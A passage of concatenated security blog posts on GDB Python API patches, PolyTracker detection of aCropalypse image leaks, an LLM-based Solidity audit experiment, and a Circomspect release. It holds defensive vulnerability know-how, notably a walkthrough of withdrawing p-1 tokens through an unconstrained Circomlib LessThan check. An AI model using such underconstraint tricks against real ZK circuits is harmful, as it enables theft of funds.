understand how GDB interfaces with Python and how the Python C API generally works. It allowed me to add my own functions and types later. Types ahoy! The second change adds the ability to create types from the Python API, where previously, you could only query for existing types using gdb.lookup_type(). Now you can directly create any primitive type supported by GDB, which can be pretty handy if you’re working on code but don’t have the symbols for it, or if you’re writing plugins to help people work with that sort of code. Types from weird extra binaries need not apply! GDB supports a fairly large number of types. All of them can be created directly using gdb.init_type or one of the specialized gdb.init_*_type functions, which let you specify parameters relevant to the type being created. Most of them work similarly, except for gdb.init_float_type, which has its own new gdb.FloatFormat type to go along with it. This lets you specify how the floating point type you’re trying to create is laid out in memory. An extra consideration that comes with this change is where exactly the memory for these new types comes from. Since these functions are based on functions already available internally in GDB, and since these functions use the obstack from a given objfile, the obstack is the memory source for these allocations. This has one big advantage: objects that reference these types and belong to the same objfile are guaranteed never to outlive them. You may already have realized a significant drawback to this method: any type allocated on it has a high chance of not being on the top of the stack when the Python runtime frees it. So regardless of their real lifetime requirements, types can be freed only along with the objfile that owns them. The main implication is that unreachable types will leak their memory for the lifetime of the objfile. Keeping track of the initialization of the type by hand would require a deeper change to the existing type object infrastructure. This is too ambitious for a first patch. Here are a few examples of this method in action: (gdb) pi>>> objfile = gdb.lookup_objfile("servo")>>>>>> # Time to standardize integer extensions. :^)>>> gdb.init_type(objfile, gdb.TYPE_CODE_INT, 24, "long short int") This creates a new 24-bit integer type named “long short int”: (gdb) pi>>> objfile = gdb.lookup_objfile("servo")>>>>>> ff = gdb.FloatFormat()>>> ff.totalsize = 32>>> ff.sign_start = 0>>> ff.exp_start = 1>>> ff.exp_len = 8>>> ff.man_start = 9>>> ff.man_len = 23>>> ff.intbit = False>>>>>> gdb.init_float_type(objfile, ff, "floatier") This creates a new floating point type reminiscent of the one available in standard x86 machines. What about the symbols? The third change adds the ability to register three symbols: types, goto labels, and statics. This makes it much easier to add new symbols, which is especially useful if you’re reverse engineering and don’t have any original symbols. Without this patch, the main way to add new symbols involves adding them to a separate file, compiling the file to the target architecture, and loading it into GDB after the base program is loaded with the add-symbol-file command. GDB’s internal symbol infrastructure is mostly not meant for on-the-fly additions. Let’s look at how GDB creates, stores, and looks up symbols. Symbols in GDB are found through pointers deep inside structures called compunit_symtab. These structures are set up through a builder that allows symbols to be added to the table as it’s being built. This builder is later responsible for registering the new structure with the (in the case of this patch) objfile that owns it. In the objfile case, these tables are stored in a list that, during lookup—disregarding the symbol lookup cache—is traversed until a symbol matching the given requirements is found in one of the tables. Currently, tables aren’t set up so that symbols can be added to the table at will after it’s been built. So if we don’t want to make deep changes to GDB before the first patch, we must find a way around this limitation. What I landed on was building a new symbol table and stringing it to the end of the list for every new symbol. Although this is a rather inefficient approach, it’s sufficient to get the feature to work. As this patch continues to be upstreamed, I aim to iron out and improve the mechanism by which this functionality is implemented. Lastly, I’d like to show an example of a new type being created and registered as a symbol for future lookup: (gdb) pi>>> objfile = gdb.lookup_objfile("servo")>>> type = gdb.init_type(objfile, gdb.TYPE_CODE_INT, 24, "long short int")>>> objfile.add_type_symbol("long short int", type)>>> gdb.lookup_type("long short int") Getting it all merged Overall, this winter at Trail of Bits produced more informative messages the ability to create supported types in GDB’s Python API, which is helpful when you don’t have symbols for the code you’re working on. GDB is old school regarding how it handles contributions. Its maintainers use email to submit, test, and comment on patches before being upstreamed. This generally means there’s a very rigid etiquette to follow when submitting a patch. As someone who had never dealt with email-based projects, my first attempt to submit a patch was bad. I cobbled together a text file with the output of git diff and then wrote the entire message by hand before sending it through a client that poorly handled non-UNIX line endings. This caused a mess that, understandably, none of the maintainers in the list inclined to patch in and test. Still, they were nice enough to tell me I should’ve done it using Git’s built-in email functionality: git send-email directly. After that particular episode, I put in the time to split off my changes into proper branches and to rebase them so that they would all be condensed into a single commit per major change. This created a more rational and descriptive message that covers the entire change and is much better suited for use with git send-email. Since then, things have been rolling pretty smoothly, though there has been a lot of back and forth trying to get all of my changes in. While the three changes have already been submitted, the one implementing __repr__() is further down the pipeline, while the other two are still awaiting review. Keep an eye out for them! By Henrik Brodin, Lead Security Engineer, Research The aCropalypse is upon us! Last week, news about CVE-2023-21036, nicknamed the “aCropalypse,” spread across Twitter and other media, and I quickly realized that the underlying flaw could be detected by our tool, PolyTracker. I’ll explain how PolyTracker can detect files affected by the vulnerability even without specific file format knowledge, which parts of a file can become subject to recovery using acropalypse.app, and how Google and Microsoft could have caught this bug by using our tools. Coincidentally, my colleagues, Evan Sultanik and Marek Surovič, and I wrote a paper that describes this class of bugs, defines a novel approach for detecting them, and introduces our implementation and tooling. It will appear at this year’s workshop on Language-Theoretic Security (LangSec) at the IEEE Security and Privacy Symposium. We use PolyTracker to instrument the image parser, libpng. (Any parser will do, not just aCropalyptic ones.) The PolyTracker instrumentation tells us which portions of the input file are completely ignored by the parser, which we call blind spots. Blind spots are almost always indicators of design flaws in the file format, malformation in the input file, and/or a bug in the parser. Normal images should have almost no blind spots, but parsing malformed aCropalyptic images through libpng reveals the cropped data in a large blind spot. The aCropalypse bugs could have been caught if the vulnerable products had been instrumented with PolyTracker and their output tested for blind spots. # parse the screenshot with an instrumented version of pngtest$ ./pngtest.instrumented re3eot.png.png out_re3eot.png.png# ask polytracker to identify any blindspots in the file$ polytracker cavities polytracker.tdag Re3eot.png,697120,1044358# found a blind spot starting at offset 697120 (size ~300KiB), it is ignored and contains the cropped out image data that could be retrieved Understanding the aCropalypse According to this tweet, it is possible to recover parts of an original image from a cropped or redacted screenshot. The TL;DR is that when the Google Pixel built-in screenshot editing tool, Markup, is used to crop or resize an image, it overwrites the original image, but only up to the offset where the new image ends. Any data from the original image after that offset is left intact in the file. David Buchanan devised an algorithm to recover the original image data still left in the file; you can read more about the specifics on his blog. More recently, Chris Blume identified a similar vulnerability for the Windows Snipping Tool. The methodology we describe here for the Markup tool can be used on images produced by the Windows Snipping Tool. PolyTracker has a feature we introduced a couple of years ago called blind spot detection. We define blind spots as the set of input bytes whose data flow never influences either the control flow that leads to an output or an output itself. Or, in layman’s terms, unused file data that can be altered to have any content without affecting the output. The cropped-out regions of an aCropalypse image are, by definition, blind spots, so PolyTracker should be able to detect them! One of the challenges of tracking input bytes and detecting blind spots for real-world inputs like PNG images or PDF documents is taint explosion. The PNG file format contains compressed chunks of image data. Compression is especially keen on contributing to taint explosion as input bytes combine in many ways to produce output bytes. PolyTracker’s unique representation of the taint structure allows us to track 2^31 unique taint labels, which is necessary for analyzing taints propagated during zlib-decompression of image data. aCropalyptic files will have Blind Spots when processed To understand why the aCropalypse vulnerability produces blind spots, we need to combine our knowledge of the vulnerability with the description of blind spots. When parsing a PNG file with a PNG parser, the parser will interpret the header data and consume chunks according to the PNG specification. In particular, it will end at a chunk with type IEND, even if that is not at the actual end of the file. We use PolyTracker to instrument a tool (pngtest from the libpng project) that reads PNG files and writes them to disk again. This will produce an additional output file, called polytracker.tdag, that captures the data flow from the runtime trace. Using that file and PolyTracker’s blind spot detection feature, we can enumerate the input bytes that do not affect the resulting image. Remember, these are the bytes of the input file that neither affect any control flow, nor end up (potentially mixed with other data) in the output file. They have no actual meaning in interpreting the format for the given parser. Show me! Using the PolyTracker-instrumented pngtest application, we load, parse, and then store the below image to disk again. During this processing, we track all input bytes through PNG and zlib processing until they eventually reach the output file in some form. We use a Docker image containing the PolyTracker instrumented pngtest application. $ docker run -ti --rm -v $(pwd):/workdir acropalypse$ cd /workdir$ /polytracker/acropalypse/libpng-1.6.39/pngtest.instrumented re3eot.png.png out_re3eot.png.png The re3eot.png image is 1044358 bytes in size, whereas the out_re3eot.png is 697,182 bytes. Although this indicates a fairly large reduction in size, at this point we can’t tell why; it could, for example, be the result of different compression settings. Next, let’s find the blind spots from this process: $ polytracker cavities polytracker.tdag 100%|███████████████████| 1048576/1048576 [00:01<00:00, 684922.43it/s]re3eot.png,697120,1044358out_re3eot.png,37,697182 The output we are interested in is: re3eot.png,697120,1044358 This tells us that the data starting from offset 697,120 to the end of the file was ignored when producing the output image. We have found a blind spot! The additional 347,238 bytes of unused data could be left from an original image—an indication of the aCropalypse vulnerability. Let’s use the acropalypse.app web page to see if we can recover it. This indicates that the file was in fact produced by the vulnerable application. At this point, we know that the image contains data from the original image at the end, as that is the core of the vulnerability. We also know the exact location and extent of that data (according to the blind spot’s starting offset and size). To confirm that the data is in fact a blind spot, let’s manually crop the original image and redo the pngtest operation to ensure that the resulting files are in fact equal. First, let’s copy only the portion that is not a blind spot—the data that is used to produce the output image. $ dd if=re3eot.png of=manually_cropped_re3eot.png count=1 bs=697120 Next, let’s run the pngtest application again: $ /polytracker/acropalypse/libpng-1.6.39/pngtest.instrumented manually_cropped_re3eot.png out_manually_cropped_re3eot.png If our assumption—that only the first 697,120 bytes were used to produce the output image— is correct, we should have two identical output files, despite the removal of 347,238 bytes from the manually_cropped_re3eot.png input file. $ sha1sum out_manually_cropped_re3eot.png out_re3eot.png8f4a0417da4c68754d2f85e059ee2ad87c02318f out_manually_cropped_re3eot.png8f4a0417da4c68754d2f85e059ee2ad87c02318f out_re3eot.png Success! To ensure that the manually cropped file isn’t still affected by the vulnerability, let’s use the web page to try to reconstruct additional image data in the file. This attempt was unsuccessful, as we have removed the original image contents. (Yes, I have checked the cropped screenshot for blind spots 😁). To better understand why the blind spot started at the particular offset, we need to examine the structure of the original image. PolyFile to the rescue PolyTracker has a sibling tool: PolyFile, a pure Python cleanroom implementation of libmagic, with instrumented parsing from Kaitai struct and an interactive hex viewer. We will use PolyFile’s ability to produce an HTML rendering of the file structure to understand why file processing ends before the file ends. First, we use the following command to produce an HTML file representing the file format: $ polyfile --html re3eot.html re3eot.png. When we open the re3eot.html file in a browser, we’ll see an initial representation of the file. By repeatedly expanding the file structure on the left-hand side, we eventually reach the final chunk. As shown in the above picture, the final chunk, when interpreting the PNG-format, has type IEND. Following that chunk is the remaining data from the original file. Note how the superfluous data starts at offset 0xaa320—that is, 697,120, the exact same offset of the identified blind spot. If you were to scroll all the way to the end, you would find an additional IEND structure (from the original image), but that is not interpreted as a valid part of the PNG file. It doesn’t stop here Having almost no knowledge of the PNG file format, we were able to use PolyTracker instrumentation on an existing PNG processing application to detect not only files that have blind spots, but also their exact location and extent. PolyTracker can detect blind spots anywhere in the file, not only at the end. Even though we analyzed PNG files, PolyTracker isn’t limited to a specific format. We have previously analyzed conversion of PDFs to PostScript using MμPDF. The same technique is valid for any application that does a load/store or deserialize/serialize operation. To further increase our understanding of the format and the effects of the vulnerability, we used PolyFile to inspect the file structure. These are just a couple of use cases for our tools, there are plenty of others! We encourage you to try our PolyTracker and PolyFile tools yourself to see how they can help you identify unexpected processing and prevent vulnerabilities similar to the aCropalypse in your application. Acknowledgements This research was supported in part by the Defense Advanced Research Projects Agency (DARPA) SafeDocs program as a subcontractor to Galois under HR0011-19-C-0073. The views, opinions, and findings expressed are those of the author and should not be interpreted as representing the official views or policies of the Department of Defense or the U.S. Government. Many thanks to Evan Sultanik, Marek Surovič, Michael Brown, Trent Brunson, Filipe Casal, Peter Goodman, Kelly Kaoudis, Lisa Overall, Stefan Nagy, Bill Harris, Nichole Schimanski, Mark Tullsen, Walt Woods, Peter Wyatt, Ange Albertini, and Sergey Bratus for their invaluable feedback on the approach and tooling. Thanks to Ange Albertini for suggesting angles morts—French for “blind spots”—to name the concept, and to Will Tan for sharing a file affected by the vulnerability. Special thanks to Carson Harmon, the original creator of PolyTracker, whose ideas and discussions germinated this research, and Evan Sultanik for helping write this blog post. By Artem Dinaburg, Chief Technology Officer; Josselin Feist, Principal Engineer; and Riccardo Schirone, Security Engineer Is artificial intelligence (AI) capable of powering software security audits? Over the last four months, we piloted a project called Toucan to find out. Toucan was intended to integrate OpenAI’s Codex into our Solidity auditing workflow. This experiment went far beyond writing “where is the bug?” in a prompt and expecting sound and complete results. Our multi-functional team, consisting of auditors, developers, and machine learning (ML) experts, put serious work into prompt engineering and developed a custom prompting framework that worked around some frustrations and limitations of current large language model (LLM) tooling, such as working with incorrect and inconsistent results, handling rate limits, and creating complex, templated chains of prompts. At every step, we evaluated how effective Toucan was and whether it would make our auditors more productive or slow them down with false positives. The technology is not yet ready for security audits for three main reasons: The models are not able to reason well about certain higher-level concepts, such as ownership of contracts, re-entrancy, and fee distribution. The software ecosystem around integrating large language models with traditional software is too crude and everything is cumbersome; there are virtually no developer-oriented tools, libraries, and type systems that work with uncertainty. There is a lack of development and debugging tools for prompt creation. To develop the libraries, language features, and tooling that will integrate core LLM technologies with traditional software, far more resources will be required. Whoever successfully creates an LLM integration experience that developers love will create an incredible moat for their platform. The above criticism still applies to GPT-4. Although it was released only a few days before the publication of this blog post, we quickly ran some of our experiments against GPT-4 (manually, via the ChatGPT interface). We conclude that GPT-4 presents an incremental improvement at analyzing Solidity code. While GPT-4 is considerably better than GPT-3.5 (ChatGPT) at analyzing Solidity, it is still missing key features, such as the ability to reason about cross-function reentrancy and inter-function relationships in general. There are also some capability regressions from Codex, like identification of variables, arithmetic expressions, and understanding of integer overflow. It is possible that with the proper prompting and context, GPT-4 could finally reason about these concepts. We look forward to experimenting more when API access to the large context GPT-4 model is released. We are still excited at the prospect of what Codex and similar LLMs can provide: analysis capabilities that can be bootstrapped with relatively little effort. Although it does not match the fidelity of good algorithmic tools, for situations where no code analysis tools exist, something imperfect may be much better than having nothing. Toucan was one of our first experiments with using LLMs for software security. We will continue to research AI-based tooling, integrating it into our workflow where appropriate, like auto-generating documentation for smart contracts under audit. AI-based capabilities are constantly improving, and we are eager to try newer, more capable technologies. We want AI tools, too Since we like to examine transformational and disruptive technologies, we evaluated OpenAI’s Codex for some internal analysis and transformation tasks and were very impressed with its abilities. For example, a recent intern integrated Codex within Ghidra to use it as a decompiler. This inspired us to see whether Codex could be applied to auditing Solidity smart contracts, given our expertise in tool development and smart contract assessments. Auditing blockchain code is an acquired skill that takes time to develop (which is why we offer apprenticeships). A good auditor must synthesize multiple insights from different domains, including finance, languages, virtual machine internals, nuances about ABIs, commonly used libraries, and complex interactions with things like pricing oracles. They must also work within realistic time constraints, so efficiency is key. We wanted Toucan to make human auditors better by increasing the amount of code they could investigate and the depth of the analysis they could accomplish. We were particularly excited because there was a chance that AI-based tools would be fundamentally better than traditional algorithmic-based tooling: it is possible to learn undecidable problems to an arbitrarily high accuracy, and program analysis bumps against undecidability all the time. We initially wanted to see if Codex could analyze code for higher-level problems that could not be examined via static analysis. Unfortunately, Codex did not provide satisfactory results because it could not reason about higher-level concepts, even though it could explain and describe them in words. We then pivoted to a different problem: could we use Codex to reduce the false positive rate from static analysis tools? After all, LLMs operate fundamentally different from our existing tools. Perhaps they provide enough signals to create new analyses previously untenable due to unacceptable false positives. Again, the answer was negative, as the number of failures was high even in average-sized code, and those failures were difficult to predict and characterize. Below we’ll discuss what we actually built and how we went about assessing Toucan’s capabilities. Was this worth our time? Our assessment does not meet the rigors of scientific research and should not be taken as such. We attempted to be empirical and data-driven in our evaluation, but our goal was to decide whether Toucan warranted further development effort—not scientific publication. At each point of Toucan development, we tried to assess whether we were on the right track. Before starting development, we manually used Codex to identify vulnerabilities that humans had found in specific open-source contracts—and with enough prompt engineering, Codex could. After we had the capability to try small examples, we focused on three main concepts that seemed within Codex’s capability to understand: ownership, re-entrancy, and integer overflow. (A quick note for the astute reader: Solidity 0.8 fixed most integer overflow issues; developing overflow checks was an exercise in evaluating Codex’s capability against past code.) We could, fairly successfully, identify vulnerabilities regarding these concepts in small, purpose-made examples. Finally, as we created enough tooling to automate asking questions against multiple larger contracts, we began to see the false positive and hallucination rates become too high.  Although we had some success with ever more complex prompts, it was still not enough to make Toucan viable. Below are some key takeaways from our experience. Codex does not fully grasp the higher-level concepts that we would like to ask about, and explaining them via complex prompt engineering does not always work or produce reliable results. We had originally intended to ask questions about higher-level concepts like ownership, re-entrancy, fee distribution, how pricing oracles are used, or even automated market makers (AMMs). Codex does not fully understand many of these abstract concepts, and asking about them failed in the initial evaluation stage. It somewhat comprehends the simplest concept — ownership — but even then it often cannot always correlate changes in the ‘owner’ variable with the concept of ownership. Codex does not appear to grasp re-entrancy attacks as a concept, even though it can describe them with natural language sentences. It is very easy to delude yourself by p-hacking a prompt that works for one or a few examples. It is extremely difficult to get a prompt that generalizes very well across multiple, diverse inputs. For example, when testing whether Toucan could reason about ownership, we initially tried seven small (<50 LOC) examples from which we could determine a baseline. After a thorough prompt-engineering effort, Toucan could pass six out of seven tests, with the lone failing test requiring complex logic to induce ownership change. We then tried the same prompt on eight larger programs (> 300 LOC), among which Toucan identified 15 potential changes of ownership, with four false positives—including complete hallucinations. However, when we tried slight permutations of the original small tests, we could usually get the prompt to fail given relatively minor changes in input. Similarly, for integer overflow tests, we could get Toucan to successfully identify overflows in 10 out of 11 small examples, with one false positive—but a larger set of five contracts produced 12 positives — with six of them being false, including four instances of complete hallucinations or inability to follow directions. Codex can be easily misled by small changes in syntax. Codex is not as precise as existing static analysis tools. It is easily confused by up comments, variable names, and small syntax changes. A particular thorn is reasoning about conditionals (e.g. ==, !=, <, >), where Codex will seemingly ignore them and create a conclusion based on function and variable names instead. Codex excels at abstract tasks that are difficult to define algorithmically, especially if errors in the output are acceptable. For example, Codex will excel at queries like “Which functions in this contract manipulate global state?” without having to define “global state” or “manipulate.” The results might not be exact, but they will often be good enough to experiment with new analysis ideas. And while it is possible to define queries like this algorithmically, it is infinitely easier to ask in plain language. The failure modes of Codex are not obvious to predict, but they are different from those of Slither and likely similar static analysis tools based on traditional algorithms. Figure 1: True positives (green) and false positives (red) found by Slither, Toucan, and both on some simple re-entrancy tests. The Toucan results are not encouraging. We tried looking at the true/false positive sets of Slither and Toucan, and found that each tool had a different set of false positives/false negatives, with some overlap (Figure 1). Codex was not able to effectively reduce the false positive rate from a prototype Slither integer overflow detector. Overall, we noticed a tendency to reply affirmatively to our questions, increasing the number of positives discovered by Toucan. Codex can perform basic static analysis tasks, but the rate of failure is too high to be useful and too difficult to characterize. This capability to perform successful analysis, even on short program fragments, is very impressive and should not be discounted! For languages that Codex understands but for which no suitable tooling exists, this capability could be extremely valuable—after all, some analysis could be much better than nothing. But the benchmark for Solidity is not nothing; we already have existing static analysis tooling that works very well. How we framed our framework During Toucan’s development, we created a custom prompting framework, a web-based front end, and rudimentary debugging and testing tools to evaluate prompts and to aid in unit and integration tests. The most important of these was the prompting framework. Prompting framework If we were making Toucan today, we’d probably just use LangChain. But at the time, LangChain did not have the features we needed. Frustratingly, neither OpenAI nor Microsoft offered an official, first-party prompting framework. This led us to develop a custom framework, with the goal that it should be possible for auditors to create new prompts without ever modifying Toucan’s code. requires = [“emit-ownership-doc”, “emit-target-contract”,] name = “Contract Ownership” scope = “contract” instantiation_condition = “any(‘admin’ in s.name.lower() or ‘owner’ in s.name.lower() for s in contract.state_variables)” [[questions]] name = “can-change” query = “Is it possible to change the `{{ contract | owner_variable }}` variable by calling a function in the `{{ contract.name }}` contract without aborting the transaction? Think through it step by step, and answer as ‘Yes’, ‘No’, or ‘Unknown’. If ‘Yes’, please specify the function.” is_decision = true [[questions]] name = “who-can-call” runtime_condition = “questions[‘can-change’].is_affirmative()” query = “””To reason about ownership: 1) First, carefully consider the code of the function 2) Second, reason step by step about the question. Who can call the function successfully, that is, without aborting or revering the transaction?””” answer_start = “””1) First, carefully consider the code of the function:””” [[questions]] name = “can-non-owner-call” runtime_condition = “questions[‘can-change’].is_affirmative()” query = “Can any sender who is not the current owner call the function without reverting or aborting?” is_decision = true finding_condition = “question.is_affirmative()” Figure 2: Sample question chain asking about contract ownership. Before questions are emitted, the prompting framework also emits a specific explanation of what ownership means, with examples and information about the target contract. Our framework supported chaining multiple questions together to support Chain of Thought and similar prompting techniques (Figure 2). Since GPT models like Codex are multi-shot learners, our framework also supported adding background information and examples before forming a prompt. The framework also supported filtering on a per-question basis, as there may also be some questions relevant only to specific kinds of contracts (say, only ERC-20 tokens), and others questions may have a specific scope (e.g., a contract, function, or file scope). Finally, each question could be optionally routed to a different model. The prompting framework also took great lengths to abide by OpenAI’s API limitations, including batching questions into one API invocation and keeping track of both the token count and API invocation rate limits. We hit these limits often and were very thankful the Codex model was free while in beta. Test data One of our development goals was that we would never compromise customer data by sending it to an OpenAI API endpoint. We had a strict policy of running Toucan only against open-source projects on GitHub (which would already have been indexed by Codex) with published reports, like those on our Publications page). We were also able to use the rather extensive test set that comes with Slither, and our “building secure contracts” reference materials as additional test data. It is important to note that some of these tests and reference materials may have been a part of the Codex training set, which explains why we saw very good results on smaller test cases. The missing tools The lack of tooling from both OpenAI and Microsoft has been extremely disappointing, although that looks to be changing: Microsoft has a prompting library, and OpenAI recently released OpenAI Evals. The kinds of tools we’d have loved to see include a prompt debugger; a tree-graph visualization of tokens in prompts and responses with logprobs of each token; tools for testing prompts against massive data sets to evaluate quality; ways to ask the same question and combine results from counterexamples; and some plugins to common unit testing frameworks. Surely someone is thinking of the developers and making these tools? Current programming languages lack the facilities for interfacing with neural architecture computers like LLMs or similar models. A core issue is the lack of capability to work with nondeterminism and uncertainty. When using LLMs, every answer has some built-in uncertainty: the outputs are inherently probabilistic, not discrete quantities. This uncertainty should be handled at the type system level so that one does not have to explicitly deal with probabilities until it is necessary. A pioneering project from Microsoft Research called Infer.NET does this for .NET-based languages, but there seem to be few concrete examples and no real tooling to combine this with LLMs. Prompt engineering, and surrounding tooling, are still in their infancy. The biggest problem is that you never know when you are done: even now, it is always possible that we were just one or two prompts away from making Toucan a success. But at some point, you have to give up in the face of costs and schedules. With this in mind, the $300K salary for a fantastic prompt engineer does not seem absurd: if the only difference between a successful LLM deployment and a failure is a few prompts, the job quickly pays for itself. Fundamentally, though, this reflects a lack of tooling to assess prompt quality and evaluate responses. There is no particularly good way to determine if one prompt is better than another or if you’re on the right track. Similarly, when a prompt fails against an input, it is frustratingly difficult to figure out why and to determine, programmatically, which prompts are merely returning the wrong result versus completely hallucinating and misbehaving. Unit tests are also problematic; the results are not guaranteed to be the same across runs, and newer models may not provide the same results as prior ones. There is certainly a solution here, but again, the tooling developers expect just wasn’t present. OpenAI Evals is likely going to improve this situation. Overall, the tooling ecosystem is lacking, and surprisingly, the biggest names in the field have not released anything substantial to improve the adoption and integration of LLMs into real software projects that people use. However, we are excited that the open source community is stepping up with really cool projects like LangChain and LlamaIndex. Humans still reign supreme OpenAI’s Codex is not yet ready to take over the job of software security auditors. It lacks the ability to reason about the proper concepts and produces too many false positives for practical usage in audit tasks. However, there is clearly a nascent capability to perform interesting analysis tasks, and underlying models should quickly get more capable. We are very excited to keep using the technology as it improves. For example, the new larger context window with GPT-4 may allow us to provide enough context and direction to handle complex tasks. Even though Codex (and GPT-4) do not currently match mature algorithmic-based tools, LLM-based tools—even those of lower quality—may have interesting uses. For languages for which no analysis tooling exists, developers can bootstrap something from LLMs relatively quickly. The ability to provide some reasonable analysis where none previously existed may be considerably better than nothing at all. We hope the ability to integrate language models into existing programs improves quickly, as there is currently a severe lack of languages, libraries, type systems, and other tooling for the integration of LLMs into traditional software. Disappointingly, the main organizations releasing LLMs have not released much tooling to enable their use. Thankfully, open-source projects are filling the gap. There is still enormous work to be done, and whoever can make a wonderful developer experience working with LLMs stands to capture developer mindshare. LLM capability is rapidly improving, and if it continues, the next generation of LLMs may serve as capable assistants to security auditors. Before developing Toucan, we used Codex to take an internal blockchain assessment occasionally used in hiring. It didn’t pass—but if it were a candidate, we’d ask it to take some time to develop its skills and return in a few months. It did return—we had GPT-4 take the same assessment—and it still didn’t pass, although it did better. Perhaps the large context window version with proper prompting could pass our assessment. We’re very eager to find out! By Fredrik Dahlgren, Principal Security Engineer strong We have released version 0.8.0 of Circomspect, our static analyzer and linter for Circom. Since our initial release of Circomspect in September 2022, we have added five new analysis passes, support for tags, tuples, and anonymous components, links to in-depth descriptions of each identified issue, and squashed a number of bugs. Please download the new version and tell us what you think! New analysis passes The new analysis passes, added to the tool’s initial nine, check for a range of issues that could occur in Circom code: Failure to properly constrain intermediate signals Failure to constrain output signals in instantiated templates Failure to constrain divisors in division operations to nonzero values Use of BN254-specific templates from Circomlib with a different curve Failure to properly constrain inputs to Circomlib’s LessThan circuit Apart from finding the issue related to the Circomlib LessThan circuit discussed below, these analysis passes would also have caught the “million dollar ZK bug” recently identified by Veridise in the circom-pairing library. To understand the types of issues that Circomspect can identify, let’s dig into the final example in this list. This analysis pass identifies an issue related to the LessThan circuit implemented by Circomlib, the de facto standard library for Circom. To fully understand the issue, we first need to take a step back and understand how signed values are represented by Circom. Signed arithmetic in GF(p) Circom programs operate on variables called signals, which represent elements in the finite field GF(p) of integers modulo a prime number p. It is common to identify the elements in GF(p) with the unsigned integers in the half-open interval [0, p). However, it is sometimes convenient to use field elements to represent signed quantities in the same way that we may use the elements in [0, 232) to represent signed 32-bit integers. Mirroring the definition for two’s complement used to represent signed integer values, we define val(x) as follows: We then say that a is less than b in GF(p) if val(a) < val(b) as signed integers. This means that q = floor(p/2) is the greatest signed value representable in GF(p), and that -q = q + 1 is the least signed value representable in GF(p). It also means, perhaps somewhat surprisingly, that q + 1 is actually less than q. This is also how the comparison operator < is implemented by the Circom compiler. As usual, we say that a is positive if a > 0 and negative if a < 0. One way to ensure that a value a is nonnegative is to restrict the size (in bits) of the binary representation of a. In particular, if the size of a is strictly less than log(p) - 1 bits, then a must be less than or equal to q and, therefore, nonnegative. Circomlib’s ‘LessThan’ template With this out of the way, let’s turn our attention to the LessThan template defined by Circomlib. This template can be used to constrain two input signals a and b to ensure that a < b, and is implemented as follows: Looking at the implementation, we see that it takes an input parameter n and two input signals in[0] and in[1], and it defines a single output signal out. Additionally, the template uses the Num2Bits template from Circomlib to constrain the output signal out. The Num2Bits template from Circomlib takes a single parameter n and can be used to convert a field element to its n-bit binary representation, which is given by the array out of size n. Since the size of the binary representation is bounded by the parameter n, the input to Num2Bits is also implicitly constrained to n bits. In the implementation of LessThan above, the expression (1 << n) + in[0] - in[1] is passed as input to Num2Bits, which constrains the absolute value |in[0] - in[1]| to n bits. To understand the subtleties of the implementation of the LessThan template, let’s first consider the expected use case when both inputs to LessThan are at most n bits, where n is small enough to ensure that both inputs are nonnegative. We have two cases to consider. If in[0] < in[1], then in[0] - in[1] is a negative n-bit value, and (1 << n) + in[0] - in[1] is a positive n-bit value. It follows that bit n in the binary representation of the input to Num2Bits is 0, and thus out must be equal to 1 - 0 = 1. On the other hand, if in[0] ≥ in[1], then in[0] - in[1] is a nonnegative n-bit value (since both inputs are positive), and (1 << n) + in[0] - in[1] is a positive (n + 1)-bit value with the most significant bit equal to 1, It follows that bit n in the binary representation of the input to Num2Bits is 1, and out must be given by 1 - 1 = 0. This all makes sense and gives us some confidence if we want to use LessThan for range proofs in our own circuits. However, things become more complicated if we forget to constrain the size of the inputs passed to LessThan. Using signals to represent unsigned quantities To describe the first type of issue that may affect circuits defined using LessThan, consider the case in which signals are used to represent unsigned values like monetary amounts. Say that we want to allow users to withdraw funds from our system without revealing sensitive information, like the total balance belonging to a single user or the amounts withdrawn by users. We could use LessThan to implement the part of the circuit that validates the withdrawn amount against the total balance as follows: Now, suppose that a malicious user with a zero balance decides to withdraw p - 1 tokens from the system, where p is the size of the underlying prime field. Clearly, this should not be allowed since p - 1 is a ridiculously large number and, in any case, the user has no tokens available for withdrawal. However, looking at the implementation of LessThan, we see that in this case, the input to Num2Bits will be given by (1 << 64) + (p - 1) - (0 + 1) = (1 << 64) - 2 (as all arithmetic is done modulo p). It follows that bit 64 of the binary representation of the input will be 0, and the output from LessThan will be 1 - n2b.out[64] = 1 - 0 = 1. This also means that ValidateWithdrawal will identify the withdrawal as valid. The problem here is that p - 1 also represents the signed quantity –1 in GF(p). Clearly, -1 is less than 1, and we have not constrained the withdrawn amount to be nonnegative. Adding a constraint restricting the size of the amount to be less than log(p) - 1 bits would ensure that the amount must be positive, which would prevent this issue. More generally, since the input parameter n to LessThan restricts only the size of the difference |in[0] - in[1]|, we typically cannot use LessThan to prevent overflows and underflows. This is a subtle point that many developers miss. As an example, consider the section on arithmetic overflows and underflows from the zero-knowledge (ZK) bug tracker maintained by 0xPARC. In an earlier version, 0xPARC suggested using LessThan to constrain the relevant signals in an example that was almost identical to the vulnerable ValidateWithdrawal template defined above! Another vulnerability of this type was found by Daira Hopwood in an early version of the ZK space-conquest game Dark Forest. Here, the vulnerability allowed users to colonize planets far outside the playing field. The developers addressed the issue by adding a range proof based on the Num2Bits template that restricted the size of the coordinates to 31 bits. Using signals to represent signed quantities Now, suppose signals are used to represent signed quantities. In particular, let’s consider what would happen if we passed q = floor(p/2) and q + 1 as inputs to LessThan. We will show that even though q + 1 < q according to the Circom compiler, q is actually less than q + 1 according to LessThan. Returning to the input to Num2Bits in the definition of LessThan, we see that if in[0] = q and in[1] = q + 1, the input to Num2Bits is given by the following expression: (1 << n) + in[0] - in[1] = (1 << n) + q - (q + 1) = (1 << n) - 1 It follows that the nth bit in the binary representation of this value is 0, and the output from LessThan is 1 - n2b.out[n] = 1 - 0 = 1. Thus, q < q + 1 according to LessThan, even though q + 1 < q according to the compiler! It is worth reiterating here that the input parameter n to LessThan does not restrict the size of the inputs, only the absolute value of their difference. Thus, we are free to pass very large (or very small) inputs to LessThan. Again, this issue can be prevented if the size of both of the inputs to the LessThan template are restricted to be less than log(p) - 1 bits. Circomspect to the rescue (part 1) To find issues of this type, Circomspect identifies locations where LessThan is used. It then tries to see whether the inputs to LessThan are constrained to less than log(p) - 1 bits using the Num2Bits template from Circomlib, and it emits a warning if it finds no such constraints. This allows the developer (or reviewer) to quickly identify locations in the codebase that require further review. As shown in the screenshot above, each warning from Circomspect will now typically also contain a link to a description of the potential issue, and recommendations for how to resolve it. Circomspect to the rescue (part 2) We would also like to mention another of our new analysis passes. The latest version of Circomspect identifies locations where a template is instantiated but the output signals defined by the template are not constrained. As an example, consider the ValidateWithdrawal template introduced above. Suppose that we rewrite the template to 